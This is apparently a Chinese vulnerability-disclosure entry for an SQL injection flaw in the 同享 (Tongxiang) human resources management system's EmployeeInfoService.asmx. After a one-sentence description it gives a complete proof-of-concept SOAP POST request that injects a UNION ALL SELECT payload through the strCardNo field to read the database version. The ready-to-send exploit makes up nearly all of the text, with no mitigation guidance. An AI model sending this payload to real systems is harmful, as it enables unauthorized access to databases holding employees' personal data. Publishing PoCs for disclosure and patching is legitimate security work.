漏洞描述
同享人力资源管理系统存在SQL注入漏洞。此漏洞是由于EmployeeInfoService.asmx对用户发送的请求缺乏校验导致的。
同享人力资源管理系统 EmployeeInfoService.asmx strCardNo SQL注入漏洞
PoC代码
POST /Service/EmployeeInfoService.asmx HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 474
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetEmployeeByCardNo"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetEmployeeByCardNo xmlns="http://tempuri.org/">
<strCardNo>1' UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--</strCardNo>
</GetEmployeeByCardNo>
</soap:Body>
</soap:Envelope>